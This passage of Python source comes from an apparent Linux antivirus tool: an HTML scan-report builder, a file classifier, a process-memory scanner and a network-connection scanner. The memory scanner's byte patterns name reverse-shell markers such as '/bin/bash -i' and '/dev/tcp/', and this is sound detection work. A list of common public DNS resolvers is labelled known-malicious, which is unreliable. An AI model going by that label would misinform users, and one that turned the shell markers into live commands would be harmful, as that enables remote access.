sys_info = get_system_info()
except Exception:
sys_info = {}
total_threats = len(threats)
status_class = "clean" if total_threats == 0 else "infected"
# --- Build threat table rows ---
threat_rows = []
for idx, t in enumerate(threats, 1):
sev = _sev_str(t)
sev_lower = sev.lower()
ttype = t.threat_type.name if hasattr(t.threat_type, "name") else str(t.threat_type)
threat_rows.append(
f"<tr>"
f'<td class="idx">{idx}</td>'
f"<td>{esc(t.path)}</td>"
f"<td>{esc(t.threat_name)}</td>"
f"<td>{esc(ttype)}</td>"
f'<td><span class="badge badge-{sev_lower}">{sev}</span></td>'
f"<td>{esc(t.detector_name)}</td>"
f'<td class="hash">{esc(t.file_hash[:16])}{"…" if len(t.file_hash) > 16 else ""}</td>'
f"</tr>"
)
threat_table = "\n".join(threat_rows) if threat_rows else (
'<tr><td colspan="7" class="empty">No threats detected ✅</td></tr>'
)
# --- System info rows ---
sys_rows = ""
if sys_info:
sys_rows = (
f"<tr><td>Hostname</td><td>{esc(str(sys_info.get('hostname', '')))}</td></tr>"
f"<tr><td>Operating System</td><td>{esc(str(sys_info.get('os_pretty', '')))}</td></tr>"
f"<tr><td>Architecture</td><td>{esc(str(sys_info.get('architecture', '')))}</td></tr>"
f"<tr><td>CPUs</td><td>{sys_info.get('cpu_count', '?')}</td></tr>"
f"<tr><td>Memory</td><td>{esc(str(sys_info.get('memory_total_human', '')))}"
f" ({sys_info.get('memory_percent', '?')}% used)</td></tr>"
f"<tr><td>Uptime</td><td>{esc(str(sys_info.get('uptime_human', '')))}</td></tr>"
)
html = f"""\
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>AYN Antivirus — Scan Report</title>
<style>
{_CSS}
</style>
</head>
<body>
<!-- Header -->
<header>
<div class="logo">⚔️ AYN ANTIVIRUS</div>
<div class="subtitle">Scan Report — {esc(now.strftime("%Y-%m-%d %H:%M:%S"))}</div>
</header>
<!-- Summary cards -->
<section class="cards">
<div class="card">
<div class="card-value">{meta.get("files_scanned", 0)}</div>
<div class="card-label">Files Scanned</div>
</div>
<div class="card card-{status_class}">
<div class="card-value">{total_threats}</div>
<div class="card-label">Threats Found</div>
</div>
<div class="card card-critical">
<div class="card-value">{sev_counts.get("CRITICAL", 0)}</div>
<div class="card-label">Critical</div>
</div>
<div class="card card-high">
<div class="card-value">{sev_counts.get("HIGH", 0)}</div>
<div class="card-label">High</div>
</div>
<div class="card card-medium">
<div class="card-value">{sev_counts.get("MEDIUM", 0)}</div>
<div class="card-label">Medium</div>
</div>
<div class="card card-low">
<div class="card-value">{sev_counts.get("LOW", 0)}</div>
<div class="card-label">Low</div>
</div>
</section>
<!-- Scan details -->
<section class="details">
<h2>Scan Details</h2>
<table class="info-table">
<tr><td>Scan ID</td><td>{esc(str(meta.get("scan_id", "N/A")))}</td></tr>
<tr><td>Scan Type</td><td>{esc(str(meta.get("scan_type", "N/A")))}</td></tr>
<tr><td>Duration</td><td>{esc(format_duration(meta.get("duration", 0)))}</td></tr>
<tr><td>Files Scanned</td><td>{meta.get("files_scanned", 0)}</td></tr>
<tr><td>Files Skipped</td><td>{meta.get("files_skipped", 0)}</td></tr>
</table>
</section>
<!-- Threat table -->
<section class="threats">
<h2>Threat Details</h2>
<table class="threat-table">
<thead>
<tr>
<th>#</th>
<th>File Path</th>
<th>Threat Name</th>
<th>Type</th>
<th>Severity</th>
<th>Detector</th>
<th>Hash</th>
</tr>
</thead>
<tbody>
{threat_table}
</tbody>
</table>
</section>
<!-- System info -->
<section class="system">
<h2>System Information</h2>
<table class="info-table">
{sys_rows}
</table>
</section>
<!-- Footer -->
<footer>
Generated by AYN Antivirus v{__version__} &mdash; {esc(now.isoformat())}
</footer>
</body>
</html>
"""
return html
# ------------------------------------------------------------------
# File output
# ------------------------------------------------------------------
@staticmethod
def save_report(content: str, filepath: str | Path) -> None:
"""Write *content* to *filepath*, creating parent dirs if needed."""
fp = Path(filepath)
fp.parent.mkdir(parents=True, exist_ok=True)
fp.write_text(content, encoding="utf-8")
# ---------------------------------------------------------------------------
# Internal helpers
# ---------------------------------------------------------------------------
def _extract(result: AnyResult) -> tuple[List[ThreatInfo], Dict[str, Any]]:
"""Return ``(threats_list, meta_dict)`` from either result type."""
if isinstance(result, FullScanResult):
sr = result.file_scan
threats = list(sr.threats)
elif isinstance(result, ScanResult):
sr = result
threats = list(sr.threats)
else:
sr = result
threats = []
meta: Dict[str, Any] = {
"scan_id": getattr(sr, "scan_id", None),
"scan_type": sr.scan_type.value if hasattr(sr, "scan_type") else None,
"start_time": sr.start_time.isoformat() if hasattr(sr, "start_time") and sr.start_time else None,
"end_time": sr.end_time.isoformat() if hasattr(sr, "end_time") and sr.end_time else None,
"duration": sr.duration_seconds if hasattr(sr, "duration_seconds") else 0,
"files_scanned": getattr(sr, "files_scanned", 0),
"files_skipped": getattr(sr, "files_skipped", 0),
}
return threats, meta
def _sev_str(threat: ThreatInfo) -> str:
"""Return the severity as an uppercase string."""
sev = threat.severity
if hasattr(sev, "name"):
return sev.name
return str(sev).upper()
def _severity_counts(threats: List[ThreatInfo]) -> Dict[str, int]:
counts: Dict[str, int] = {"CRITICAL": 0, "HIGH": 0, "MEDIUM": 0, "LOW": 0}
for t in threats:
key = _sev_str(t)
counts[key] = counts.get(key, 0) + 1
return counts
# ---------------------------------------------------------------------------
# Embedded CSS (dark theme)
# ---------------------------------------------------------------------------
_CSS = """\
:root {
--bg: #0f1117;
--surface: #1a1d27;
--border: #2a2d3a;
--text: #e0e0e0;
--text-dim: #8b8fa3;
--accent: #00bcd4;
--critical: #ff1744;
--high: #ff9100;
--medium: #ffea00;
--low: #00e676;
--clean: #00e676;
--infected: #ff1744;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Segoe UI', 'Inter', system-ui, -apple-system, sans-serif;
background: var(--bg);
color: var(--text);
line-height: 1.6;
padding: 0;
}
header {
background: linear-gradient(135deg, #1a1d27 0%, #0d1117 100%);
border-bottom: 2px solid var(--accent);
text-align: center;
padding: 2rem 1rem;
}
header .logo {
font-size: 2rem;
font-weight: 800;
color: var(--accent);
letter-spacing: 0.1em;
}
header .subtitle {
color: var(--text-dim);
font-size: 0.95rem;
margin-top: 0.3rem;
}
section {
max-width: 1200px;
margin: 2rem auto;
padding: 0 1.5rem;
}
h2 {
color: var(--accent);
font-size: 1.25rem;
margin-bottom: 1rem;
border-bottom: 1px solid var(--border);
padding-bottom: 0.4rem;
}
/* Summary cards */
.cards {
display: flex;
flex-wrap: wrap;
gap: 1rem;
max-width: 1200px;
margin: 2rem auto;
padding: 0 1.5rem;
}
.card {
flex: 1 1 140px;
background: var(--surface);
border: 1px solid var(--border);
border-radius: 8px;
padding: 1.2rem 1rem;
text-align: center;
}
.card-value {
font-size: 2rem;
font-weight: 700;
color: var(--text);
}
.card-label {
color: var(--text-dim);
font-size: 0.85rem;
margin-top: 0.2rem;
}
.card-clean .card-value { color: var(--clean); }
.card-infected .card-value { color: var(--infected); }
.card-critical .card-value { color: var(--critical); }
.card-high .card-value { color: var(--high); }
.card-medium .card-value { color: var(--medium); }
.card-low .card-value { color: var(--low); }
/* Tables */
table {
width: 100%;
border-collapse: collapse;
}
.info-table td {
padding: 0.5rem 0.75rem;
border-bottom: 1px solid var(--border);
}
.info-table td:first-child {
color: var(--text-dim);
width: 180px;
font-weight: 600;
}
.threat-table {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 8px;
overflow: hidden;
}
.threat-table thead th {
background: #12141c;
color: var(--accent);
padding: 0.7rem 0.75rem;
text-align: left;
font-size: 0.85rem;
text-transform: uppercase;
letter-spacing: 0.05em;
}
.threat-table tbody td {
padding: 0.6rem 0.75rem;
border-bottom: 1px solid var(--border);
font-size: 0.9rem;
word-break: break-all;
}
.threat-table tbody tr:hover {
background: rgba(0, 188, 212, 0.06);
}
.threat-table .idx { color: var(--text-dim); width: 40px; }
.threat-table .hash { font-family: monospace; color: var(--text-dim); font-size: 0.8rem; }
.threat-table .empty { text-align: center; color: var(--clean); padding: 2rem; font-size: 1.1rem; }
/* Severity badges */
.badge {
display: inline-block;
padding: 0.15rem 0.6rem;
border-radius: 4px;
font-size: 0.78rem;
font-weight: 700;
text-transform: uppercase;
letter-spacing: 0.04em;
}
.badge-critical { background: rgba(255,23,68,0.15); color: var(--critical); border: 1px solid var(--critical); }
.badge-high { background: rgba(255,145,0,0.15); color: var(--high); border: 1px solid var(--high); }
.badge-medium { background: rgba(255,234,0,0.12); color: var(--medium); border: 1px solid var(--medium); }
.badge-low { background: rgba(0,230,118,0.12); color: var(--low); border: 1px solid var(--low); }
/* Footer */
footer {
text-align: center;
color: var(--text-dim);
font-size: 0.8rem;
padding: 2rem 1rem;
border-top: 1px solid var(--border);
margin-top: 3rem;
}
/* System info */
.system { margin-bottom: 2rem; }
"""
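`generate_json` passes `default=str` to `json.dumps` so values that are not JSON-native (datetimes, enum members) serialize via their string form instead of raising. The effect in isolation:

```python
import json
from datetime import datetime

report = {"generated_at": datetime(2026, 3, 3, 12, 0, 0), "count": 2}
# Without default=str, json.dumps raises TypeError on the datetime value.
decoded = json.loads(json.dumps(report, indent=2, default=str))
assert decoded["generated_at"] == "2026-03-03 12:00:00"
```

This keeps the report generator robust against whatever types end up in threat metadata, at the cost of timestamps arriving as plain strings on the consumer side.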


@@ -0,0 +1,17 @@
"""AYN Antivirus scanner modules."""
from ayn_antivirus.scanners.base import BaseScanner
from ayn_antivirus.scanners.container_scanner import ContainerScanner
from ayn_antivirus.scanners.file_scanner import FileScanner
from ayn_antivirus.scanners.memory_scanner import MemoryScanner
from ayn_antivirus.scanners.network_scanner import NetworkScanner
from ayn_antivirus.scanners.process_scanner import ProcessScanner
__all__ = [
"BaseScanner",
"ContainerScanner",
"FileScanner",
"MemoryScanner",
"NetworkScanner",
"ProcessScanner",
]


@@ -0,0 +1,58 @@
"""Abstract base class for all AYN scanners."""
from __future__ import annotations
import logging
from abc import ABC, abstractmethod
from typing import Any
logger = logging.getLogger(__name__)
class BaseScanner(ABC):
"""Common interface that every scanner module must implement.
Subclasses provide a ``scan`` method whose *target* argument type varies
by scanner (a file path, a PID, a network connection, etc.).
"""
# ------------------------------------------------------------------
# Identity
# ------------------------------------------------------------------
@property
@abstractmethod
def name(self) -> str:
"""Short, machine-friendly scanner identifier (e.g. ``"file_scanner"``)."""
...
@property
@abstractmethod
def description(self) -> str:
"""Human-readable one-liner describing what this scanner does."""
...
# ------------------------------------------------------------------
# Scanning
# ------------------------------------------------------------------
@abstractmethod
def scan(self, target: Any) -> Any:
"""Run the scanner against *target* and return a result object.
The concrete return type is defined by each subclass.
"""
...
# ------------------------------------------------------------------
# Helpers available to all subclasses
# ------------------------------------------------------------------
def _log_info(self, msg: str, *args: Any) -> None:
logger.info("[%s] " + msg, self.name, *args)
def _log_warning(self, msg: str, *args: Any) -> None:
logger.warning("[%s] " + msg, self.name, *args)
def _log_error(self, msg: str, *args: Any) -> None:
logger.error("[%s] " + msg, self.name, *args)
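The `_log_*` helpers prepend the scanner name by concatenating format strings and passing `self.name` as the first %-argument, keeping logging's lazy formatting intact. A standalone check of that pattern:

```python
import io
import logging

buf = io.StringIO()
log = logging.getLogger("ayn.demo")
log.addHandler(logging.StreamHandler(buf))
log.setLevel(logging.INFO)

# Same shape as BaseScanner._log_info: prefix format + name as first %-arg.
log.info("[%s] " + "scanned %d files", "file_scanner", 3)
assert buf.getvalue().strip() == "[file_scanner] scanned 3 files"
```

Because the message is only formatted when a handler actually emits the record, disabled log levels cost almost nothing.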

(file diff suppressed because it is too large)


@@ -0,0 +1,258 @@
"""File-system scanner for AYN Antivirus.
Walks directories, gathers file metadata, hashes files, and classifies
them by type (ELF binary, script, suspicious extension) so that downstream
detectors can focus on high-value targets.
"""
from __future__ import annotations
import grp
import logging
import os
import pwd
import stat
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, Generator, List, Optional
from ayn_antivirus.constants import (
MAX_FILE_SIZE,
SUSPICIOUS_EXTENSIONS,
)
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Well-known magic bytes
# ---------------------------------------------------------------------------
_ELF_MAGIC = b"\x7fELF"
_SCRIPT_SHEBANGS = (b"#!", b"#!/")
_PE_MAGIC = b"MZ"
class FileScanner(BaseScanner):
"""Enumerates, classifies, and hashes files on disk.
This scanner does **not** perform threat detection itself — it prepares
the metadata that detectors (YARA, hash-lookup, heuristic) consume.
Parameters
----------
max_file_size:
Skip files larger than this (bytes). Defaults to
:pydata:`constants.MAX_FILE_SIZE`.
"""
def __init__(self, max_file_size: int = MAX_FILE_SIZE) -> None:
self.max_file_size = max_file_size
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "file_scanner"
@property
def description(self) -> str:
return "Enumerates and classifies files on disk"
def scan(self, target: Any) -> Dict[str, Any]:
"""Scan a single file and return its metadata + hash.
Parameters
----------
target:
A path (``str`` or ``Path``) to the file.
Returns
-------
dict
Keys: ``path``, ``size``, ``hash``, ``is_elf``, ``is_script``,
``suspicious_ext``, ``info``, ``header``, ``error``.
"""
filepath = Path(target)
result: Dict[str, Any] = {
"path": str(filepath),
"size": 0,
"hash": "",
"is_elf": False,
"is_script": False,
"suspicious_ext": False,
"info": {},
"header": b"",
"error": None,
}
try:
info = self.get_file_info(filepath)
result["info"] = info
result["size"] = info.get("size", 0)
except OSError as exc:
result["error"] = str(exc)
return result
if result["size"] > self.max_file_size:
result["error"] = f"Exceeds max size ({result['size']} > {self.max_file_size})"
return result
try:
result["hash"] = self.compute_hash(filepath)
except OSError as exc:
result["error"] = f"Hash failed: {exc}"
return result
try:
result["header"] = self.read_file_header(filepath)
except OSError:
pass # non-fatal
result["is_elf"] = self.is_elf_binary(filepath)
result["is_script"] = self.is_script(filepath)
result["suspicious_ext"] = self.is_suspicious_extension(filepath)
return result
# ------------------------------------------------------------------
# Directory walking
# ------------------------------------------------------------------
@staticmethod
def walk_directory(
path: str | Path,
recursive: bool = True,
exclude_patterns: Optional[List[str]] = None,
) -> Generator[Path, None, None]:
"""Yield every regular file under *path*.
Parameters
----------
path:
Root directory to walk.
recursive:
If ``False``, only yield files in the top-level directory.
exclude_patterns:
Path prefixes or glob-style patterns to skip. A file is skipped
if its absolute path starts with any pattern string.
"""
root = Path(path).resolve()
exclude = [str(Path(p).resolve()) for p in (exclude_patterns or [])]
if root.is_file():
yield root
return
iterator = root.rglob("*") if recursive else root.iterdir()
try:
for entry in iterator:
if not entry.is_file():
continue
entry_str = str(entry)
if any(entry_str.startswith(ex) for ex in exclude):
continue
yield entry
except PermissionError:
logger.warning("Permission denied walking: %s", root)
# ------------------------------------------------------------------
# File metadata
# ------------------------------------------------------------------
@staticmethod
def get_file_info(path: str | Path) -> Dict[str, Any]:
"""Return a metadata dict for the file at *path*.
Keys
----
size, permissions, permissions_octal, owner, group, modified_time,
created_time, is_symlink, is_suid, is_sgid.
Raises
------
OSError
If the file cannot be stat'd.
"""
p = Path(path)
st = p.stat()
mode = st.st_mode
# Owner / group — fall back gracefully on systems without the user.
try:
owner = pwd.getpwuid(st.st_uid).pw_name
except (KeyError, ImportError):
owner = str(st.st_uid)
try:
group = grp.getgrgid(st.st_gid).gr_name
except (KeyError, ImportError):
group = str(st.st_gid)
return {
"size": st.st_size,
"permissions": stat.filemode(mode),
"permissions_octal": oct(mode & 0o7777),
"owner": owner,
"group": group,
"modified_time": datetime.utcfromtimestamp(st.st_mtime).isoformat(),
"created_time": datetime.utcfromtimestamp(st.st_ctime).isoformat(),
"is_symlink": p.is_symlink(),
"is_suid": bool(mode & stat.S_ISUID),
"is_sgid": bool(mode & stat.S_ISGID),
}
# ------------------------------------------------------------------
# Hashing
# ------------------------------------------------------------------
@staticmethod
def compute_hash(path: str | Path, algorithm: str = "sha256") -> str:
"""Compute file hash. Delegates to canonical implementation."""
from ayn_antivirus.utils.helpers import hash_file
return hash_file(str(path), algo=algorithm)
# ------------------------------------------------------------------
# Header / magic number
# ------------------------------------------------------------------
@staticmethod
def read_file_header(path: str | Path, size: int = 8192) -> bytes:
"""Read the first *size* bytes of a file (for magic-number checks).
Raises
------
OSError
If the file cannot be opened.
"""
with open(path, "rb") as fh:
return fh.read(size)
# ------------------------------------------------------------------
# Type classification
# ------------------------------------------------------------------
@staticmethod
def is_elf_binary(path: str | Path) -> bool:
"""Return ``True`` if *path* begins with the ELF magic number."""
try:
with open(path, "rb") as fh:
return fh.read(4) == _ELF_MAGIC
except OSError:
return False
@staticmethod
def is_script(path: str | Path) -> bool:
"""Return ``True`` if *path* starts with a shebang (``#!``)."""
try:
with open(path, "rb") as fh:
head = fh.read(3)
return any(head.startswith(s) for s in _SCRIPT_SHEBANGS)
except OSError:
return False
@staticmethod
def is_suspicious_extension(path: str | Path) -> bool:
"""Return ``True`` if the file suffix is in :pydata:`SUSPICIOUS_EXTENSIONS`."""
return Path(path).suffix.lower() in SUSPICIOUS_EXTENSIONS
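The magic-byte classification above can be exercised without the rest of the package; a minimal self-contained sketch (the ELF constant is copied from this module, the helper name is illustrative):

```python
import os
import tempfile
from pathlib import Path

_ELF_MAGIC = b"\x7fELF"

def classify(path: Path) -> str:
    # Mirrors FileScanner.is_elf_binary / is_script: inspect the first bytes.
    with open(path, "rb") as fh:
        head = fh.read(4)
    if head == _ELF_MAGIC:
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    return "other"

# A shebang file classifies as a script.
with tempfile.NamedTemporaryFile("wb", suffix=".sh", delete=False) as fh:
    fh.write(b"#!/bin/sh\necho hi\n")
print(classify(Path(fh.name)))  # script
os.unlink(fh.name)
```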


@@ -0,0 +1,332 @@
"""Process memory scanner for AYN Antivirus.
Reads ``/proc/<pid>/maps`` and ``/proc/<pid>/mem`` on Linux to search for
injected code, suspicious byte patterns (mining pool URLs, known malware
strings), and anomalous RWX memory regions.
Most operations require **root** privileges. On non-Linux systems the
scanner gracefully returns empty results.
"""
from __future__ import annotations
import logging
import os
import re
from pathlib import Path
from typing import Any, Dict, List, Optional, Sequence
from ayn_antivirus.constants import CRYPTO_POOL_DOMAINS
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
# Default byte-level patterns to search for in process memory.
_DEFAULT_PATTERNS: List[bytes] = [
# Mining pool URLs
*(domain.encode() for domain in CRYPTO_POOL_DOMAINS),
# Common miner stratum strings
b"stratum+tcp://",
b"stratum+ssl://",
b"stratum2+tcp://",
# Suspicious shell commands sometimes found in injected memory
b"/bin/sh -c",
b"/bin/bash -i",
b"/dev/tcp/",
    # Known malware markers. Note: the last two also occur in benign 64-bit
    # Linux binaries, so treat matches as weak signals rather than verdicts.
    b"PAYLOAD_START",
    b"x86_64-linux-gnu",
    b"ELF\x02\x01\x01",
]
# Size of chunks when reading /proc/<pid>/mem.
_MEM_READ_CHUNK = 65536
# Regex to parse a single line from /proc/<pid>/maps.
# address perms offset dev inode pathname
# 7f1c2a000000-7f1c2a021000 rw-p 00000000 00:00 0 [heap]
_MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([r-][w-][x-][sp])\s+\S+\s+\S+\s+\d+\s*(.*)",
    re.MULTILINE,
)
class MemoryScanner(BaseScanner):
"""Scan process memory for injected code and suspicious patterns.
.. note::
This scanner only works on Linux where ``/proc`` is available.
Operations on ``/proc/<pid>/mem`` typically require root or
``CAP_SYS_PTRACE``.
"""
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "memory_scanner"
@property
def description(self) -> str:
return "Scans process memory for injected code and malicious patterns"
def scan(self, target: Any) -> Dict[str, Any]:
"""Scan a single process by PID.
Parameters
----------
target:
The PID (``int``) of the process to inspect.
Returns
-------
dict
``pid``, ``rwx_regions``, ``pattern_matches``, ``strings_sample``,
``error``.
"""
pid = int(target)
result: Dict[str, Any] = {
"pid": pid,
"rwx_regions": [],
"pattern_matches": [],
"strings_sample": [],
"error": None,
}
if not Path("/proc").is_dir():
result["error"] = "Not a Linux system — /proc not available"
return result
try:
result["rwx_regions"] = self.find_injected_code(pid)
result["pattern_matches"] = self.scan_for_patterns(pid, _DEFAULT_PATTERNS)
result["strings_sample"] = self.get_memory_strings(pid, min_length=8)[:200]
except PermissionError:
result["error"] = f"Permission denied reading /proc/{pid}/mem (need root)"
except FileNotFoundError:
result["error"] = f"Process {pid} no longer exists"
except Exception as exc:
result["error"] = str(exc)
logger.exception("Error scanning memory for PID %d", pid)
return result
# ------------------------------------------------------------------
# /proc/<pid>/maps parsing
# ------------------------------------------------------------------
@staticmethod
def _read_maps(pid: int) -> List[Dict[str, Any]]:
"""Parse ``/proc/<pid>/maps`` and return a list of memory regions.
Each dict contains ``start`` (int), ``end`` (int), ``perms`` (str),
``pathname`` (str).
Raises
------
FileNotFoundError
If the process does not exist.
PermissionError
If the caller cannot read the maps file.
"""
maps_path = Path(f"/proc/{pid}/maps")
content = maps_path.read_text()
regions: List[Dict[str, Any]] = []
for match in _MAPS_RE.finditer(content):
regions.append({
"start": int(match.group(1), 16),
"end": int(match.group(2), 16),
"perms": match.group(3),
"pathname": match.group(4).strip(),
})
return regions
# ------------------------------------------------------------------
# Memory reading helper
# ------------------------------------------------------------------
@staticmethod
def _read_region(pid: int, start: int, end: int) -> bytes:
"""Read bytes from ``/proc/<pid>/mem`` between *start* and *end*.
Returns as many bytes as could be read; silently returns partial
data if parts of the region are not readable.
"""
mem_path = f"/proc/{pid}/mem"
data = bytearray()
try:
fd = os.open(mem_path, os.O_RDONLY)
try:
os.lseek(fd, start, os.SEEK_SET)
remaining = end - start
while remaining > 0:
chunk_size = min(_MEM_READ_CHUNK, remaining)
try:
chunk = os.read(fd, chunk_size)
except OSError:
break
if not chunk:
break
data.extend(chunk)
remaining -= len(chunk)
finally:
os.close(fd)
except OSError:
pass # region may be unmapped by the time we read
return bytes(data)
# ------------------------------------------------------------------
# Public scanning methods
# ------------------------------------------------------------------
def scan_process_memory(self, pid: int) -> List[Dict[str, Any]]:
"""Scan all readable regions of a process's address space.
Returns a list of dicts, one per region, containing ``start``,
``end``, ``perms``, ``pathname``, and a boolean ``has_suspicious``
flag set when default patterns are found.
Raises
------
PermissionError, FileNotFoundError
"""
regions = self._read_maps(pid)
results: List[Dict[str, Any]] = []
for region in regions:
# Only read regions that are at least readable.
if not region["perms"].startswith("r"):
continue
size = region["end"] - region["start"]
if size > 50 * 1024 * 1024:
continue # skip very large regions to avoid OOM
data = self._read_region(pid, region["start"], region["end"])
has_suspicious = any(pat in data for pat in _DEFAULT_PATTERNS)
results.append({
"start": hex(region["start"]),
"end": hex(region["end"]),
"perms": region["perms"],
"pathname": region["pathname"],
"size": size,
"has_suspicious": has_suspicious,
})
return results
def find_injected_code(self, pid: int) -> List[Dict[str, Any]]:
"""Find memory regions with **RWX** (read-write-execute) permissions.
Legitimate applications rarely need RWX regions. Their presence may
indicate code injection, JIT shellcode, or a packed/encrypted payload
that has been unpacked at runtime.
Returns a list of dicts with ``start``, ``end``, ``perms``,
``pathname``, ``size``.
"""
regions = self._read_maps(pid)
rwx: List[Dict[str, Any]] = []
for region in regions:
perms = region["perms"]
# RWX = positions: r(0) w(1) x(2)
if len(perms) >= 3 and perms[0] == "r" and perms[1] == "w" and perms[2] == "x":
size = region["end"] - region["start"]
rwx.append({
"start": hex(region["start"]),
"end": hex(region["end"]),
"perms": perms,
"pathname": region["pathname"],
"size": size,
"severity": "HIGH",
"reason": f"RWX region ({size} bytes) — possible code injection",
})
return rwx
def get_memory_strings(
self,
pid: int,
min_length: int = 6,
) -> List[str]:
"""Extract printable ASCII strings from readable memory regions.
Parameters
----------
min_length:
Minimum string length to keep.
Returns a list of decoded strings (capped at 500 chars each).
"""
regions = self._read_maps(pid)
strings: List[str] = []
printable_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
for region in regions:
if not region["perms"].startswith("r"):
continue
size = region["end"] - region["start"]
if size > 10 * 1024 * 1024:
continue # skip huge regions
data = self._read_region(pid, region["start"], region["end"])
for match in printable_re.finditer(data):
s = match.group().decode("ascii", errors="replace")
strings.append(s[:500])
# Cap total to avoid unbounded memory usage.
if len(strings) >= 10_000:
return strings
return strings
def scan_for_patterns(
self,
pid: int,
patterns: Optional[Sequence[bytes]] = None,
) -> List[Dict[str, Any]]:
"""Search process memory for specific byte patterns.
Parameters
----------
patterns:
Byte strings to search for. Defaults to
:pydata:`_DEFAULT_PATTERNS` (mining pool URLs, stratum prefixes,
shell commands).
Returns a list of dicts with ``pattern``, ``region_start``,
``region_perms``, ``offset``.
"""
if patterns is None:
patterns = _DEFAULT_PATTERNS
regions = self._read_maps(pid)
matches: List[Dict[str, Any]] = []
for region in regions:
if not region["perms"].startswith("r"):
continue
size = region["end"] - region["start"]
if size > 50 * 1024 * 1024:
continue
data = self._read_region(pid, region["start"], region["end"])
for pat in patterns:
idx = data.find(pat)
if idx != -1:
matches.append({
"pattern": pat.decode("utf-8", errors="replace"),
"region_start": hex(region["start"]),
"region_perms": region["perms"],
"region_pathname": region["pathname"],
"offset": idx,
"severity": "HIGH",
"reason": f"Suspicious pattern found in memory: {pat[:60]!r}",
})
return matches
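The maps-line parsing above can be exercised standalone on a sample line; this sketch uses a permission-field pattern that also accepts non-readable regions (per the proc(5) format, each of r/w/x may be `-` and the last flag is `s` or `p`):

```python
import re

MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([r-][w-][x-][sp])\s+\S+\s+\S+\s+\d+\s*(.*)",
    re.MULTILINE,
)

sample = "7f1c2a000000-7f1c2a021000 rwxp 00000000 00:00 0    [heap]\n"
m = MAPS_RE.search(sample)
region = {
    "start": int(m.group(1), 16),
    "end": int(m.group(2), 16),
    "perms": m.group(3),
    "pathname": m.group(4).strip(),
}
print(region["perms"], hex(region["end"] - region["start"]))  # rwxp 0x21000
```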


@@ -0,0 +1,328 @@
"""Network scanner for AYN Antivirus.
Inspects active TCP/UDP connections for traffic to known mining pools,
suspicious ports, and unexpected listening services. Also audits
``/etc/resolv.conf`` for DNS hijacking indicators.
"""
from __future__ import annotations
import logging
import re
from pathlib import Path
from typing import Any, Dict, List, Optional
import psutil
from ayn_antivirus.constants import (
CRYPTO_POOL_DOMAINS,
SUSPICIOUS_PORTS,
)
from ayn_antivirus.scanners.base import BaseScanner
logger = logging.getLogger(__name__)
# Well-known system services that are *expected* to listen — extend as needed.
_EXPECTED_LISTENERS = {
22: "sshd",
53: "systemd-resolved",
80: "nginx",
443: "nginx",
3306: "mysqld",
5432: "postgres",
6379: "redis-server",
8080: "java",
}
# Known-malicious / suspicious public DNS servers sometimes injected by
# malware into resolv.conf to redirect DNS queries.
_SUSPICIOUS_DNS_SERVERS = [
"8.8.4.4", # not inherently bad, but worth noting if unexpected
"1.0.0.1",
"208.67.222.123",
"198.54.117.10",
"77.88.8.7",
"94.140.14.14",
]
class NetworkScanner(BaseScanner):
"""Scan active network connections for suspicious activity.
Wraps :func:`psutil.net_connections` and enriches each connection with
process ownership and threat classification.
"""
# ------------------------------------------------------------------
# BaseScanner interface
# ------------------------------------------------------------------
@property
def name(self) -> str:
return "network_scanner"
@property
def description(self) -> str:
return "Inspects network connections for mining pools and suspicious ports"
def scan(self, target: Any = None) -> Dict[str, Any]:
"""Run a full network scan.
*target* is ignored — all connections are inspected.
Returns
-------
dict
``total``, ``suspicious``, ``unexpected_listeners``, ``dns_issues``.
"""
all_conns = self.get_all_connections()
suspicious = self.find_suspicious_connections()
listeners = self.check_listening_ports()
dns = self.check_dns_queries()
return {
"total": len(all_conns),
"suspicious": suspicious,
"unexpected_listeners": listeners,
"dns_issues": dns,
}
# ------------------------------------------------------------------
# Connection enumeration
# ------------------------------------------------------------------
@staticmethod
def get_all_connections() -> List[Dict[str, Any]]:
"""Return a snapshot of every inet connection.
Each dict contains: ``fd``, ``family``, ``type``, ``local_addr``,
``remote_addr``, ``status``, ``pid``, ``process_name``.
"""
result: List[Dict[str, Any]] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return result
for conn in connections:
local = f"{conn.laddr.ip}:{conn.laddr.port}" if conn.laddr else ""
remote = f"{conn.raddr.ip}:{conn.raddr.port}" if conn.raddr else ""
proc_name = ""
if conn.pid:
try:
proc_name = psutil.Process(conn.pid).name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
proc_name = "?"
result.append({
"fd": conn.fd,
"family": str(conn.family),
"type": str(conn.type),
"local_addr": local,
"remote_addr": remote,
"status": conn.status,
"pid": conn.pid,
"process_name": proc_name,
})
return result
# ------------------------------------------------------------------
# Suspicious-connection detection
# ------------------------------------------------------------------
def find_suspicious_connections(self) -> List[Dict[str, Any]]:
"""Identify connections to known mining pools or suspicious ports.
Checks remote addresses against :pydata:`constants.CRYPTO_POOL_DOMAINS`
and :pydata:`constants.SUSPICIOUS_PORTS`.
"""
suspicious: List[Dict[str, Any]] = []
try:
connections = psutil.net_connections(kind="inet")
except psutil.AccessDenied:
logger.warning("Insufficient permissions to read network connections")
return suspicious
for conn in connections:
raddr = conn.raddr
if not raddr:
continue
remote_ip = raddr.ip
remote_port = raddr.port
local_str = f"{conn.laddr.ip}:{conn.laddr.port}" if conn.laddr else "?"
remote_str = f"{remote_ip}:{remote_port}"
proc_info = self.resolve_process_for_connection(conn)
# Suspicious port.
if remote_port in SUSPICIOUS_PORTS:
suspicious.append({
"local_addr": local_str,
"remote_addr": remote_str,
"pid": conn.pid,
"process": proc_info,
"status": conn.status,
"reason": f"Connection on known mining port {remote_port}",
"severity": "HIGH",
})
